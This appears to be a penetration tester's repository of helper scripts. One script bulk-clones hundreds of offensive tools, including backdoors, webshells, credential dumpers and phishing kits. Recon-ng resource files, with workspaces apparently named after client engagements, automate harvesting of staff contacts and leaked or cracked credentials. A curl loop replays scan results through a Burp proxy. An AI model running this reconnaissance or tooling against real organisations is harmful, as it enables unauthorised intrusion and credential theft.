├── README.md ├── ctfme ├── dirbuster2burp.sh ├── gen-recon-rc ├── .DS_Store ├── .rc ├── modules.txt ├── recon-rc-gen.sh ├── run-discovery-modules.rc └── run-recon-modules.rc ├── gitlist.sh ├── gitme ├── gitupdate.sh ├── gitupdate2.sh ├── jk-fierce.tar ├── jk-fierce ├── hosts.txt └── subdomains2.txt ├── jknmap ├── macosxhack.sh ├── powershell.sh ├── replace-openjdk-with-oraclejdk.txt ├── snmp-all-community.txt ├── start-listener.py ├── svn.sh ├── wgetlist.sh ├── wp5.sh └── xssf.sh /README.md: -------------------------------------------------------------------------------- 1 | These files are lists of my favorite git projects. 2 | gitlist.sh is a bash script that pulls all the projects. 3 | wgetlist.sh does the same for the few that arent on github 4 | svn.sh see above 5 | powershell.sh pulls just the powershell stuff into /var/wwww 6 | -------------------------------------------------------------------------------- /ctfme: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | cd ctf 3 | git add -A * 4 | git commit -m "adding a few tools" 5 | git push -u origin master 6 | -------------------------------------------------------------------------------- /dirbuster2burp.sh: -------------------------------------------------------------------------------- 1 | cat $1 | grep '^\/' | grep -v ':' | while read line; do curl -s http://[target of scan]$line --proxy 127.0.0.1:8080 -o /dev/null; done 2 | -------------------------------------------------------------------------------- /gen-recon-rc/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/macubergeek/gitlist/707223c7b04501dba69a4a05217e50b4e8017585/gen-recon-rc/.DS_Store -------------------------------------------------------------------------------- /gen-recon-rc/.rc: -------------------------------------------------------------------------------- 1 | “./recon-ng -w 2 | “What is name of company?” 3 | “add companies” 4 | “” 5 | “What is name of domain?” 6 | add domains 7 | 8 | “./recon-ng -w 9 | “What is name of company?” 10 | “add companies” 11 | 12 | “” 13 | “What is name of domain?” 14 | add domains 15 | 16 | ./recon-ng -w 17 | “What is name of company?” 18 | “add companies” 19 | 20 | “” 21 | “What is name of domain?” 22 | add domains 23 | 24 | ./recon-ng -w 25 | “What is name of company?” 26 | “add companies” 27 | 28 | “” 29 | “What is name of domain?” 30 | ./recon-ng -w 31 | “What is name of company?” 32 | “add companies” 33 | 34 | “” 35 | “What is name of domain?” 36 | -------------------------------------------------------------------------------- /gen-recon-rc/modules.txt: -------------------------------------------------------------------------------- 1 | recon/companies-contacts/jigsaw/point_usage 2 | recon/companies-contacts/jigsaw/purchase_contact 3 | recon/companies-contacts/jigsaw/search_contacts 4 | recon/companies-contacts/jigsaw_auth 5 | recon/companies-contacts/linkedin_auth 6 | recon/companies-multi/github_miner 7 | recon/companies-multi/whois_miner 8 | recon/companies-profiles/bing_linkedin 9 | recon/contacts-contacts/mailtester 10 | recon/contacts-contacts/mangle 11 | recon/contacts-contacts/unmangle 12 | recon/contacts-credentials/hibp_breach 13 | recon/contacts-credentials/hibp_paste 14 | recon/contacts-credentials/pwnedlist 15 | recon/contacts-domains/migrate_contacts 16 | recon/contacts-profiles/fullcontact 17 | recon/credentials-credentials/adobe 18 | recon/credentials-credentials/bozocrack 19 | recon/credentials-credentials/hashes_org 20 | recon/credentials-credentials/leakdb 21 | recon/domains-contacts/metacrawler 22 | recon/domains-contacts/pgp_search 23 | recon/domains-contacts/salesmaple 24 | recon/domains-contacts/whois_pocs 25 | recon/domains-credentials/pwnedlist/account_creds 26 | recon/domains-credentials/pwnedlist/api_usage 27 | recon/domains-credentials/pwnedlist/domain_creds 28 | recon/domains-credentials/pwnedlist/domain_ispwned 29 | recon/domains-credentials/pwnedlist/leak_lookup 30 | recon/domains-credentials/pwnedlist/leaks_dump 31 | recon/domains-hosts/baidu_site 32 | recon/domains-hosts/bing_domain_api 33 | recon/domains-hosts/bing_domain_web 34 | recon/domains-hosts/builtwith 35 | recon/domains-hosts/google_site_api 36 | recon/domains-hosts/google_site_web 37 | recon/domains-hosts/netcraft 38 | recon/domains-hosts/shodan_hostname 39 | recon/domains-hosts/ssl_san 40 | recon/domains-hosts/vpnhunter 41 | recon/domains-hosts/yahoo_domain 42 | recon/domains-vulnerabilities/ghdb 43 | recon/domains-vulnerabilities/punkspider 44 | recon/domains-vulnerabilities/xssed 45 | recon/domains-vulnerabilities/xssposed 46 | recon/hosts-domains/migrate_hosts 47 | recon/hosts-hosts/bing_ip 48 | recon/hosts-hosts/freegeoip 49 | recon/hosts-hosts/ip_neighbor 50 | recon/hosts-hosts/ipinfodb 51 | recon/hosts-hosts/resolve 52 | recon/hosts-hosts/reverse_resolve 53 | recon/locations-locations/geocode 54 | recon/locations-locations/reverse_geocode 55 | recon/locations-pushpins/flickr 56 | recon/locations-pushpins/instagram 57 | recon/locations-pushpins/picasa 58 | recon/locations-pushpins/shodan 59 | recon/locations-pushpins/twitter 60 | recon/netblocks-companies/whois_orgs 61 | recon/netblocks-hosts/reverse_resolve 62 | recon/netblocks-hosts/shodan_net 63 | recon/netblocks-ports/census_2012 64 | recon/ports-hosts/migrate_ports 65 | recon/profiles-contacts/dev_diver 66 | recon/profiles-contacts/linkedin 67 | recon/profiles-profiles/linkedin_crawl 68 | recon/profiles-profiles/namechk 69 | recon/profiles-profiles/profiler 70 | recon/profiles-profiles/twitter 71 | recon/profiles-repositories/github_repos 72 | recon/repositories-vulnerabilities/gists_search 73 | recon/repositories-vulnerabilities/github_dorks 74 | -------------------------------------------------------------------------------- /gen-recon-rc/recon-rc-gen.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | echo "Set up workspace, domain, locations, hosts, subnets." 3 | echo "What is name of workspace?" 4 | read ws 5 | echo workspaces select $ws >> ../$ws.rc 6 | for i in `cat modules.txt`;do echo $i&& echo run;done | sed 's/recon/use recon/g' >> ../$ws.rc 7 | -------------------------------------------------------------------------------- /gen-recon-rc/run-discovery-modules.rc: -------------------------------------------------------------------------------- 1 | workspaces select BCBS 2 | use discovery/info_disclosure/cache_snoop 3 | run 4 | use discovery/info_disclosure/interesting_files 5 | run 6 | -------------------------------------------------------------------------------- /gen-recon-rc/run-recon-modules.rc: -------------------------------------------------------------------------------- 1 | workspaces select FRTIB2 2 | use recon/companies-contacts/linkedin_auth 3 | run 4 | use recon/companies-multi/whois_miner 5 | run 6 | use recon/companies-profiles/bing_linkedin 7 | run 8 | use recon/contacts-contacts/mailtester 9 | run 10 | use recon/contacts-contacts/mangle 11 | run 12 | use recon/contacts-contacts/unmangle 13 | run 14 | use recon/contacts-credentials/hibp_breach 15 | run 16 | use recon/contacts-credentials/hibp_paste 17 | run 18 | use recon/contacts-credentials/pwnedlist 19 | run 20 | use recon/contacts-domains/migrate_contacts 21 | run 22 | use recon/contacts-profiles/fullcontact 23 | run 24 | use recon/credentials-credentials/adobe 25 | run 26 | use recon/credentials-credentials/bozocrack 27 | run 28 | use recon/credentials-credentials/hashes_org 29 | run 30 | use recon/credentials-credentials/leakdb 31 | run 32 | use recon/domains-contacts/pgp_search 33 | run 34 | use recon/domains-contacts/salesmaple 35 | run 36 | use recon/domains-contacts/whois_pocs 37 | run 38 | use recon/domains-hosts/baidu_site 39 | run 40 | use recon/domains-hosts/bing_domain_api 41 | run 42 | use recon/domains-hosts/bing_domain_web 43 | run 44 | use recon/domains-hosts/brute_hosts 45 | run 46 | use recon/domains-hosts/builtwith 47 | run 48 | use recon/domains-hosts/google_site_api 49 | run 50 | use recon/domains-hosts/google_site_web 51 | run 52 | use recon/domains-hosts/netcraft 53 | run 54 | use recon/domains-hosts/shodan_hostname 55 | run 56 | use recon/domains-hosts/ssl_san 57 | run 58 | use recon/domains-hosts/vpnhunter 59 | run 60 | use recon/domains-hosts/yahoo_domain 61 | run 62 | use recon/domains-vulnerabilities/punkspider 63 | run 64 | use recon/domains-vulnerabilities/xssed 65 | run 66 | use recon/domains-vulnerabilities/xssposed 67 | run 68 | use recon/hosts-domains/migrate_hosts 69 | run 70 | use recon/hosts-hosts/bing_ip 71 | run 72 | use recon/hosts-hosts/freegeoip 73 | run 74 | use recon/hosts-hosts/ip_neighbor 75 | run 76 | use recon/hosts-hosts/ipinfodb 77 | run 78 | use recon/hosts-hosts/resolve 79 | run 80 | use recon/hosts-hosts/reverse_resolve 81 | run 82 | use recon/locations-locations/geocode 83 | run 84 | use recon/locations-locations/reverse_geocode 85 | run 86 | use recon/locations-pushpins/flickr 87 | run 88 | use recon/locations-pushpins/instagram 89 | run 90 | use recon/locations-pushpins/picasa 91 | run 92 | use recon/locations-pushpins/shodan 93 | run 94 | use recon/locations-pushpins/twitter 95 | run 96 | use recon/locations-pushpins/youtube 97 | run 98 | use recon/netblocks-companies/whois_orgs 99 | run 100 | use recon/netblocks-hosts/reverse_resolve 101 | run 102 | use recon/netblocks-hosts/shodan_net 103 | run 104 | use recon/netblocks-ports/census_2012 105 | run 106 | use recon/ports-hosts/migrate_ports 107 | run 108 | use recon/profiles-contacts/dev_diver 109 | run 110 | use recon/profiles-contacts/linkedin 111 | run 112 | use recon/profiles-profiles/linkedin_crawl 113 | run 114 | use recon/profiles-profiles/namechk 115 | run 116 | use recon/profiles-profiles/profiler 117 | run 118 | use recon/profiles-profiles/twitter 119 | run 120 | -------------------------------------------------------------------------------- /gitlist.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | a=`cat <<-EOF 3 | https://github.com/urbanesec/ZackAttack.git 4 | https://github.com/rogueclown/recon-scripts.git 5 | https://bitbucket.org/LaNMaSteR53/recon-ng.git 6 | https://bitbucket.org/LaNMaSteR53/honeybadger.git 7 | https://bitbucket.org/LaNMaSteR53/peepingtom.git 8 | http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs 9 | https://github.com/toolswatch/DPE.git 10 | https://github.com/mubix/post-exploitation.git 11 | https://github.com/1aN0rmus/TekDefense-Automater.git 12 | https://github.com/ornicar/backdoor.git 13 | https://github.com/SpiderLabs/BurpNotesExtension.git 14 | https://github.com/SmeegeSec/WSDLWizard.git 15 | https://github.com/Meatballs1/burp-extensions.git 16 | https://github.com/abhijitsverma/burp_extension_MultiScanner.git 17 | https://github.com/SpiderLabs/UPnP-request-generator.git 18 | https://github.com/moxie0/sslstrip.git 19 | https://github.com/moxie0/sslsniff.git 20 | https://github.com/GDSSecurity/PadBuster.git 21 | https://github.com/nealharris/BREACH.git 22 | https://github.com/sqlmapproject/sqlmap.git 23 | https://github.com/Neohapsis/bbqsql.git 24 | https://github.com/GDSSecurity/SQLBrute.git 25 | https://github.com/7a/owtf.git 26 | https://github.com/beefproject/beef.git 27 | https://github.com/ianic/mssql.git 28 | https://github.com/milo2012/osintstalker.git 29 | https://github.com/mossmann/hackrf.git 30 | https://github.com/rsmudge/cortana-scripts.git 31 | https://github.com/mubix/vt-notify.git 32 | https://github.com/wick2o/gitDigger.git 33 | https://github.com/Hood3dRob1n/ShodanAPI.git 34 | https://github.com/jvehent/cipherscan.git 35 | https://github.com/gps-sdr/gps-sdr.git 36 | https://github.com/azet/Software-Defined-Radio.git 37 | https://github.com/kpreid/shinysdr.git 38 | https://github.com/csete/gqrx.git 39 | https://github.com/texane/nrf.git 40 | https://github.com/EliasOenal/multimon-ng.git 41 | https://github.com/b00stfr3ak/misc.git 42 | https://github.com/brav0hax/smbexec.git 43 | https://github.com/b00stfr3ak/fast_meterpreter.git 44 | https://code.google.com/p/lazykali/ 45 | git://git.gnumonks.org/airprobe.git 46 | git://git.srlabs.de/kraken.git 47 | https://github.com/fgont/ipv6toolkit.git 48 | https://github.com/mattifestation/PowerSploit.git 49 | https://github.com/urbanadventurer/WhatWeb.git 50 | https://github.com/mhendrickx/Lilith.git 51 | https://github.com/cr0hn/golismero.git 52 | https://github.com/mandatoryprogrammer/xssless.git 53 | https://github.com/zmap/zmap.git 54 | https://github.com/robertdavidgraham/masscan.git 55 | https://github.com/tiwaryshailesh/Masscan-For-Metasploit.git 56 | https://github.com/macubergeek/gitlist.git 57 | https://github.com/opinkerfi/winexe.git 58 | https://github.com/kanzure/python-wmi-client-wrapper.git 59 | https://gist.github.com/9107276.git 60 | https://github.com/PenturaLabs/Linux_Exploit_Suggester.git 61 | https://github.com/mmoya/pkg-thc-ipv6.git 62 | https://github.com/bastibl/gr-rds.git 63 | https://github.com/Hood3dRob1n/creep3r.git 64 | https://github.com/fgont/ipv6toolkit.git 65 | https://github.com/mmoya/pkg-thc-ipv6.git 66 | https://github.com/leebaird/discover.git 67 | https://github.com/lightos/Panoptic.git 68 | https://github.com/QBurst/PenQ.git 69 | https://github.com/MooseDojo/Serpico.git 70 | https://github.com/SpiderLabs/Responder.git 71 | https://github.com/mattifestation/PowerSploit.git 72 | https://github.com/TigerSecurity/gerix-wifi-cracker.git 73 | http://www.openvas.org/download/wmi/wmi-1.3.14.tar.bz2: 74 | https://github.com/wpscanteam/wpscan.git 75 | https://github.com/mubix/WhiteChapel.git 76 | https://gist.github.com/10107280.git 77 | https://gist.github.com/9107284.git 78 | https://gist.github.com/9107276.git 79 | https://github.com/mmessano/PowerShell.git 80 | https://github.com/brav0hax/easy-creds.git 81 | https://github.com/felmoltor/DNSSnoopDogg.git 82 | https://github.com/robertdavidgraham/heartleech.git 83 | git://git.openssl.org/openssl.git 84 | https://github.com/mubix/netview.git 85 | https://github.com/mubix/WhiteChapel.git 86 | git://github.com/anestisb/WeBaCoo.git 87 | https://gist.github.com/5371322.git 88 | https://github.com/slattman/php-reverse-shell.git 89 | git://github.com/zacinaction/kicksat.wiki.git 90 | https://github.com/inquisb/keimpx.git 91 | https://github.com/TheRook/subbrute.git 92 | https://gist.github.com/10171593.git 93 | https://github.com/rsmudge/metasploit-loader.git 94 | https://gist.github.com/b54e50a3dddfb3fadd0a.git 95 | https://github.com/jekyc/wig.git 96 | https://github.com/bastibl/gr-ieee802-11.git 97 | https://github.com/dcramer/chardet.git 98 | https://github.com/client9/sslassert.git 99 | https://github.com/toddsiegel/spscan.git 100 | https://github.com/EarToEarOak/RTLSDR-Scanner.git 101 | https://github.com/kevinmehall/rtlsdr-433m-sensor.git 102 | https://github.com/bemasher/rtlamr.git 103 | https://github.com/nickodell/morse-code.git 104 | https://github.com/merbanan/rtl_433.git 105 | https://github.com/sensepost/mana.git 106 | https://github.com/ksnieck/airprobe.git 107 | https://github.com/rasta-mouse/Mjolnir.git 108 | https://github.com/Netflix/Scumblr.git 109 | https://github.com/Netflix/Workflowable.git 110 | https://github.com/Netflix/sketchy.git 111 | https://github.com/mutability/rtl-sdr.git 112 | https://github.com/csete/gnuradio-grc-examples.git 113 | http://git.gnuradio.org/git/gnuradio.git 114 | https://github.com/omriiluz/NRF24-BTLE-Decoder.git 115 | https://github.com/bemasher/rtlamr.git 116 | https://github.com/eT0M/rtl_sdr_FS20_decoder.git 117 | https://github.com/jacobzelek/rtl_sdr_kit.git 118 | https://github.com/yuvadm/gascop.git 119 | https://github.com/antirez/dump1090.git 120 | https://github.com/skaringa/weather-sdr-decode.git 121 | https://github.com/Nuand/bladeRF.git 122 | https://github.com/allfro/sploitego.git 123 | https://github.com/balle/bluediving.git 124 | https://github.com/tkuester/gr-psk31.git 125 | https://github.com/bgamari/gnuradio-multimode.git 126 | https://github.com/secretsquirrel/the-backdoor-factory.git 127 | https://github.com/secretsquirrel/BDFProxy 128 | git://git.osmocom.org/sdrangelove.git 129 | https://github.com/OWASP/O-Saft.git 130 | https://github.com/rockymeza/wifi.git 131 | https://github.com/clockfort/wifi-locator.git 132 | https://github.com/OpenSecurityResearch/hostapd-wpe.git 133 | https://github.com/windytan/slowrx.git 134 | https://github.com/offensive-security/kali-sly-pi.git 135 | https://github.com/AdamLaurie/RFIDIOt.git 136 | https://github.com/Proxmark/proxmark3.git 137 | https://github.com/rezeusor/killerbee.git 138 | https://github.com/CoreSecurity/impacket.git 139 | https://github.com/Miserlou/Hash-Identifier.git 140 | https://github.com/freaklabs/chibiArduino.git 141 | https://bitbucket.org/skew/gyuto.git 142 | https://github.com/fishnetsecurity/Lair.git 143 | https://github.com/ctfs/write-ups.git 144 | https://github.com/trustedsec/unicorn.git 145 | https://github.com/poweradminllc/PAExec.git 146 | https://github.com/HarmJ0y/PowerUp.git 147 | https://github.com/zeknox/scripts.git 148 | https://github.com/darkoperator/Posh-SecMod.git 149 | https://github.com/besimorhino/powercat.git 150 | https://github.com/vacmf/powershell-scripts.git 151 | https://github.com/silentbreaksec/Throwback.git 152 | https://github.com/TweekFawkes/White_Lightning.git 153 | https://github.com/kirill85/BlackSquirrel.git 154 | git://w1.fi/hostap.git 155 | https://github.com/SilverFoxx/PwnSTAR.git 156 | https://github.com/nidem/kerberoast.git 157 | https://github.com/silentbreaksec/ThrowbackLP.git 158 | https://github.com/roeyk/nessus-report.git 159 | https://github.com/travisgoodspeed/goodfet goodfet 160 | https://github.com/robotastic/smartnet-scanner.git 161 | https://github.com/pinkavaj/gr-scan.git 162 | https://github.com/jboone/tpms.git 163 | https://github.com/sitsec/bruteforce-crc.git 164 | https://github.com/nccgroup/metasploitavevasion.git 165 | https://github.com/pentestgeek/phishing-frenzy.git 166 | https://github.com/pentestgeek/phishing-frenzy-templates.git 167 | https://github.com/AdamLaurie/RFIDIOt.git 168 | https://github.com/rainkid/httrack.git 169 | https://github.com/junks/linkedInScraper.git 170 | https://bitbucket.org/al14s/rawr.git 171 | https://github.com/rebootuser/LinEnum.git 172 | https://github.com/bidord/pykek.git 173 | https://github.com/moxie0/chapcrack.git 174 | https://github.com/0xsauby/yasuo.git 175 | https://bitbucket.org/R4v3N/wp-plug.git 176 | https://github.com/leechristensen/UnmanagedPowerShell.git 177 | https://github.com/trustedsec/hash_parser.git 178 | https://github.com/smunaut/osmo-pocsag.git 179 | https://github.com/bafe/gr-pocsag.git 180 | git://git.osmocom.org/gr-osmosdr 181 | https://github.com/mitmproxy/mitmproxy.git 182 | https://github.com/vk496/linset.git 183 | https://github.com/galkan/crowbar 184 | https://github.com/covertcodes/freqwatch.git 185 | https://github.com/sixdub/Minions.git 186 | git://github.com/kennethreitz/requests.git 187 | https://github.com/wireghoul/dotdotpwn.git 188 | https://github.com/superkojiman/dirtshell.git 189 | https://github.com/superkojiman/rfishell.git 190 | https://github.com/ikkisoft/bradamsa.git 191 | https://github.com/smicallef/spiderfoot.git 192 | https://github.com/invisiblethreat/peeper.git 193 | https://github.com/devttys0/binwalk.git 194 | https://github.com/devttys0/binwalk.wiki.git 195 | https://github.com/TweekFawkes/White_Lightning.git 196 | https://github.com/danielmiessler/SecLists.git 197 | https://code.google.com/p/patator/ 198 | https://github.com/argilo/sdr-examples.git 199 | https://github.com/milo2012/metasploitHelper.git 200 | https://github.com/Veil-Framework/Veil-Evasion.git 201 | https://github.com/Veil-Framework/PowerTools.git 202 | https://github.com/Veil-Framework/Veil.git 203 | https://github.com/Veil-Framework/Veil-Pillage.git 204 | https://github.com/Veil-Framework/Veil-Catapult.git 205 | https://github.com/SmeegeSec/HashTag.git 206 | https://github.com/gentilkiwi/mimikatz.git 207 | https://github.com/malerisch/burp-csj.git 208 | https://github.com/ShawnDEvans/smbmap.git 209 | https://github.com/stephenfewer/ReflectiveDLLInjection.git 210 | https://github.com/SecureNetworkManagement/shellshockUAscanner.git 211 | https://github.com/glentregoning/mitmtest.git 212 | https://github.com/rebootuser/LinEnum.git 213 | https://github.com/sethsec/crossdomain-exploitation-framework.git 214 | https://github.com/gursev/flash-xdomain-xploit.git 215 | https://github.com/NetSPI/Wsdler/archive/master.zip 216 | https://github.com/rustyrobot/fuzzdb.git 217 | https://github.com/iagox86/dnscat2.git 218 | https://github.com/sixdub/DomainTrustExplorer.git 219 | https://github.com/docker/docker.git 220 | https://github.com/stasinopoulos/commix.git 221 | https://github.com/hatRiot/zarp.git 222 | https://github.com/infobyte/faraday.git 223 | https://github.com/Hood3dRob1n/addicted2hash.git 224 | https://github.com/byt3bl33d3r/gcat.git 225 | https://github.com/enigma0x3/Generate-Macro.git 226 | https://github.com/tcstool/NoSQLMap.git 227 | https://github.com/cheetz/pi_phone_home.git 228 | https://github.com/cheetz/spearphishing.git 229 | https://github.com/cheetz/adobe_password_checker.git 230 | https://github.com/cheetz/Web_Password_Gen.git 231 | https://github.com/cheetz/brutescrape.git 232 | https://github.com/MaYaSeVeN/Wmap.git 233 | https://github.com/sophron/wifiphisher.git 234 | https://github.com/cheetz/Easy-P.git 235 | https://github.com/michenriksen/gitrob.git 236 | https://github.com/secforce/sparta.git 237 | https://github.com/breenmachine/httpscreenshot.git 238 | https://github.com/ChrisTruncer/EyeWitness.git 239 | https://github.com/HackerFantastic/Public.git 240 | https://github.com/cheetz/icmpshock.git 241 | https://github.com/rapid7/ssh-badkeys.git 242 | https://github.com/sbehrens/sleepy-puppy.git 243 | https://github.com/trustedsec/social-engineer-toolkit.git 244 | https://github.com/tatanus/SPF.git 245 | https://github.com/obscuresec/random.git 246 | https://github.com/jkakavas/creepy.git 247 | https://github.com/evilsocket/bettercap.git 248 | https://github.com/EiNSTeiN-/poodle.git 249 | https://github.com/mpgn/poodle-exploit.git 250 | https://github.com/JayBeale/middler.git 251 | https://github.com/felmoltor/DNSSnoopDogg.git 252 | https://github.com/z0mbiehunt3r/dns-snoopy.git 253 | https://github.com/GDSSecurity/SSH-Weak-DH.git 254 | https://github.com/trustedsec/ptf 255 | https://github.com/trustedsec/meterssh.git 256 | https://github.com/PowerShellEmpire/Empire.git 257 | https://github.com/spinkham/skipfish.git 258 | https://github.com/RetireJS/retire.js.git 259 | https://github.com/jhaddix/domain.git 260 | https://github.com/Dionach/CMSmap.git 261 | https://github.com/intrigueio/intrigue-core.git 262 | https://github.com/debasishm89/burpy.git 263 | https://github.com/arvinddoraiswamy/mywebappscripts.git 264 | https://github.com/jhaddix/domain.git 265 | https://github.com/jhaddix/tbhm.git 266 | https://github.com/NytroRST/NetRipper.git 267 | https://github.com/Ali-Razmjoo/OWASP-ZSC.git 268 | https://github.com/Smaash/snitch.git 269 | https://github.com/google/binnavi.git 270 | https://github.com/dagorim/api_wordlist.git 271 | https://github.com/enjoiz/XXEinjector.git 272 | https://github.com/yorickdewid/Wordgen.git 273 | https://github.com/gojhonny/CredCrack.git 274 | https://github.com/AbhishekGhosh/FREAK-Attack-CVE-2015-0204-Testing-Script.git 275 | https://github.com/IFGHou/Grendel-Scan.git 276 | https://github.com/aircrack-ng/aircrack-ng.git 277 | https://github.com/twilsonb/jbrofuzz.git 278 | https://github.com/pentestmonkey/unix-privesc-check.git 279 | https://github.com/ajinabraham/YSO-Mobile-Security-Framework.git 280 | https://github.com/linux-can/can-utils.git 281 | https://github.com/RUB-NDS/WS-Attacker.git 282 | https://github.com/vetsin/SamlSnort.git 283 | https://github.com/mandatoryprogrammer/sonar.git 284 | https://github.com/milo2012/osintstalker.git 285 | https://github.com/exitnode/nmap-sqlite-output.git 286 | https://github.com/nmap/nmap.git 287 | https://github.com/LionSec/wifresti.git 288 | https://github.com/dloss/python-pentest-tools.git 289 | https://github.com/tiwaryshailesh/MetasploitOnSteroids.git 290 | https://github.com/mattifestation/WMI_Backdoor.git 291 | https://github.com/NetSPI/cmdsql.git 292 | https://github.com/brad-anton/freeradius-wpe.git 293 | https://github.com/b00stfr3ak/fast_meterpreter.git 294 | https://github.com/tennc/webshell.git 295 | https://raw.githubusercontent.com/musalbas/heartbleed-masstest/master/ssltest.py 296 | https://gist.github.com/10100394.git 297 | https://gist.github.com/10174134.git 298 | https://github.com/decal/ssltest-stls.git 299 | https://github.com/ajinabraham/Static-DOM-XSS-Scanner.git 300 | https://github.com/gbrindisi/xsssniper.git 301 | https://github.com/portcullislabs/xssshell-xsstunnell.git 302 | https://github.com/portcullislabs/rdp-sec-check.git 303 | https://github.com/averagesecurityguy/scripts.git 304 | https://github.com/MooseDojo/praedasploit.git 305 | https://github.com/byt3bl33d3r/CrackMapExec.git 306 | https://bitbucket.org/mattinfosec/wordhound.git 307 | https://github.com/cheetz/reddit_xss.git 308 | https://github.com/epinna/weevely3.git 309 | https://github.com/fireeye/synfulknock.git 310 | https://gist.github.com/4461a4853ba0741b2a29.git 311 | https://gist.github.com/1c4e34af21acb679641a.git 312 | https://github.com/evilpacket/DVCS-Pillage.git 313 | https://github.com/SYWorks/wifi-harvester.git 314 | https://github.com/drwetter/testssl.sh.git 315 | https://github.com/kussic/arlandria.git 316 | https://github.com/SYWorks/network_harvester.git 317 | https://github.com/SYWorks/wpa-bruteforcer.git 318 | https://github.com/AnimeshShaw/Hash-Algorithm-Identifier.git 319 | https://github.com/hybridus/heartbleedscanner.git 320 | https://github.com/hybridus/heartbleedscanner.git 321 | https://github.com/ChrisTruncer/Just-Metadata.git 322 | https://bitbucket.org/clr2of8/autoscanwithburp.git 323 | https://github.com/Shellntel/scripts.git 324 | https://github.com/cornerpirate/ReportCompiler.git 325 | https://github.com/funoverip/epowner.git 326 | https://github.com/foreni-packages/cisco-global-exploiter.git 327 | https://github.com/sandrogauci/tftptheft.git 328 | https://github.com/1N3/Findsploit.git 329 | https://github.com/CoderPirata/XPL-SEARCH.git 330 | https://github.com/xdistro/ShellShock.git 331 | https://github.com/jumanjihouse/docker-ssllabs-scan.git 332 | https://github.com/ChrisTruncer/Just-Metadata.git 333 | https://github.com/Hypsurus/weeman.git 334 | https://github.com/SSTCYR/nipper-ng.git 335 | https://github.com/droe/sslsplit 336 | https://github.com/Kevin-Robertson/Inveigh.git 337 | https://github.com/NullArray/PyCat.git 338 | https://github.com/strictlymike/tools.git 339 | https://github.com/sullo/nikto.git 340 | https://github.com/ZilentJack/Get-ADHashDump.git 341 | https://github.com/dolevf/tracetester.git 342 | https://github.com/CoderPirata/XPL-SEARCH.git 343 | https://github.com/offwidth/http-tunnel-aes.git 344 | https://github.com/denandz/KeeFarce.git 345 | https://github.com/maurosoria/dirs3arch.git 346 | https://github.com/techgaun/github-dorks.git 347 | https://github.com/jgor/dork-cli.git 348 | https://github.com/quackware/dorky.git 349 | https://gist.github.com/5950305.git 350 | https://github.com/fuzzdb-project/fuzzdb.git 351 | https://github.com/kahunalu/pwnbin.git 352 | https://github.com/secabstraction/PowerCat.git 353 | https://github.com/samratashok/nishang.git 354 | https://github.com/ChrisTruncer/Egress-Assess.git 355 | https://github.com/nccgroup/chuckle.git 356 | https://github.com/ChrisTruncer/WMIOps.git 357 | https://github.com/psypanda/hashID.git 358 | https://github.com/n1nj4sec/pupy.git 359 | https://github.com/silentbreaksec/UnmanagedPowerShell.git 360 | https://github.com/silentbreaksec/Throwback.git 361 | https://github.com/silentbreaksec/ThrowbackLP.git 362 | https://github.com/silentbreaksec/Trebuchet.git 363 | https://github.com/hfiref0x/UACME.git 364 | https://github.com/0xd4d/dnSpy.git 365 | https://github.com/1N3/Sn1per.git 366 | https://github.com/pentestmonkey/windows-privesc-check.git 367 | https://github.com/samratashok/Kautilya.git 368 | https://github.com/danielmiessler/RobotsDisallowed.git 369 | https://github.com/HarmJ0y/CheatSheets.git 370 | https://github.com/ParrotSec/alternate-install.git 371 | https://github.com/securitytube/wifiscanvisualizer.git 372 | https://github.com/commonexploits/livehosts.git 373 | https://github.com/commonexploits/dtpscan.git 374 | https://github.com/commonexploits/weape.git 375 | https://github.com/commonexploits/weape.git 376 | https://github.com/commonexploits/port-scan-automation.git 377 | https://github.com/commonexploits/winocphc.git 378 | https://github.com/commonexploits/vlan-hopping.git 379 | https://github.com/nccgroup/easyda.git 380 | https://github.com/nccgroup/cisco-SNMP-enumeration.git 381 | https://github.com/juliocesarfort/netscreen-shodan-scanner.git 382 | https://github.com/herrbischoff/awesome-osx-command-line.git 383 | https://github.com/vanhauser-thc/thc-hydra.git 384 | https://github.com/jkbrzt/httpie.git 385 | https://github.com/mandatoryprogrammer/FlashHTTPRequest.git 386 | https://github.com/hatRiot/clusterd.git 387 | https://github.com/nvbn/everpad.git 388 | https://github.com/paramiko/paramiko.git 389 | https://github.com/scadastrangelove/SCADAPASS.git 390 | https://github.com/leonteale/pentestpackage.git 391 | https://github.com/commonexploits/whatsfree.git 392 | https://github.com/commonexploits/dtpscan.git 393 | https://github.com/commonexploits/weape.git 394 | https://github.com/commonexploits/vlan-hopping.git 395 | https://github.com/nccgroup/cisco-SNMP-enumeration.git 396 | https://github.com/Warpnet/scantool.git 397 | https://github.com/Gallopsled/pwntools.git 398 | https://github.com/allfro/BurpKit.git 399 | https://github.com/allfro/pymiproxy.git 400 | https://github.com/darkoperator/dnsrecon.git 401 | https://github.com/elceef/dnstwist.git 402 | https://github.com/foxglovesec/Potato.git 403 | https://github.com/packetfocus/Recon.git 404 | https://github.com/iamchippa/dumpmon-scraper.git 405 | https://github.com/Gradberry/Email-Permutator.git 406 | https://github.com/aboul3la/Sublist3r.git 407 | https://github.com/Kevin-Robertson/Tater 408 | https://github.com/rsmudge/Malleable-C2-Profiles.git 409 | https://github.com/leonteale/pentestpackage.git 410 | https://github.com/JohnTroony/php-webshells.git 411 | https://github.com/hardwaterhacker/URLCrazy.git 412 | https://github.com/jaredhaight/PSAttack.git 413 | https://github.com/mubix/post-exploitation.git 414 | https://github.com/milo2012/pentest_scripts.git 415 | https://github.com/sensepost/BiLE-suite.git 416 | https://github.com/Raikia/SMBCrunch.git 417 | https://github.com/Raikia/CredSwissArmy.git 418 | https://github.com/ericevenchick/CANard.git 419 | https://github.com/danielmiessler/ATM 420 | https://github.com/linuz/Email-Verifier.git 421 | https://github.com/khr0x40sh/MacroShop.git 422 | https://github.com/thezawad/rev-door.git 423 | https://github.com/Charliedean/psexecspray.git 424 | https://github.com/Hypsurus/weeman.git 425 | https://github.com/eklitzke/c.sh.git 426 | https://github.com/PowerShell/PowerShell.git 427 | https://github.com/USArmyResearchLab/Dshell.git 428 | https://github.com/znb/Scripts.git 429 | EOF` 430 | cd ../ 431 | for i in $a 432 | do 433 | git clone $i 434 | done 435 | -------------------------------------------------------------------------------- /gitme: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #cd gitlist 